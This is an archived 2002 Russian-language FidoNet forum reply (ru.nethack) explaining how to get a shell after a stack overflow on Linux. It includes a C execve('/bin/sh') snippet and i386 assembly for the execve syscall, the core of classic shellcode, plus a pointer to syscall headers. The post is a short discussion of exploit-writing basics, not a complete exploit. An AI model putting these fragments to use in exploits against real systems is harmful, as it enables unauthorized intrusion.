ru.nethack

 
 - RU.NETHACK -------------------------------------------------------------------
 From : Eugene Korovin                       2:5080/196.72  20 Feb 2002  00:01:24
 To : Roman Korzhov
 Subject : Re: Stack overflow
 -------------------------------------------------------------------------------- 
 

 
 Sun, 17 Feb 2002 19:14:01 +0500, you wrote:
 
 RK> Как после срыва стека под Linux вызвать shell?
 
 например так:
 
   char* arg[] = { "-", NULL};
         execve("/bin/sh", arg, NULL);
 
 но лучше его pty-шку запихивать...
 
 RK> Под MD все понятно - в памяти сидят DLL, через них можно сделать
 RK> практически все.
 
 ;-))
 
 RK> А под Linux, я так понимаю, нет понятия динамической библиотеки, т.е.
 RK> все нужные функции линкуются к исполняемому файлу при компиляции.
 
 АГАщазБЛИH
 
 RK> Или надо юзать syscall?
 
 Если это не сделаешь ты, то за тебя это сделает /lib/libc.so.X
 
 RK> Hо тогда надо знать адреса системных функций OS
 
 что-то на типа:
 
   movl $11, %eax
   movl $bin_sh, %ebx 
   movl $arg, %ecx
   movl $0, %edx
   int $0x80
 
 на виндузячий сам переведешь
 
 RK> (а где их достать?),
 
 less /usr/include/asm/unistd.h
 
 RK> и exploit получается привязанным к данной OS.
 
 в любом случае
   With best regards, Eugene [ Registered Linux user #194650 ]
 --- tin/1.5.8-20010221 ("Blue Water") (UNIX) (Linux/2.4.18-rc2 (i686))
  * Origin: Everything ends badly.  Otherwise it wouldn't end. (2:5080/196.72)
 
 

Вернуться к списку тем, сортированных по: возрастание даты  уменьшение даты  тема  автор 

Тема:    Автор:    Дата:    Stack overflow   Roman Korzhov   17 Feb 2002 20:14:01   Re: Stack overflow   Eugene Korovin   20 Feb 2002 00:01:24   Stack overflow   Roman Korzhov   20 Feb 2002 09:03:00   Re: Stack overflow   Eugene Korovin   22 Feb 2002 00:48:06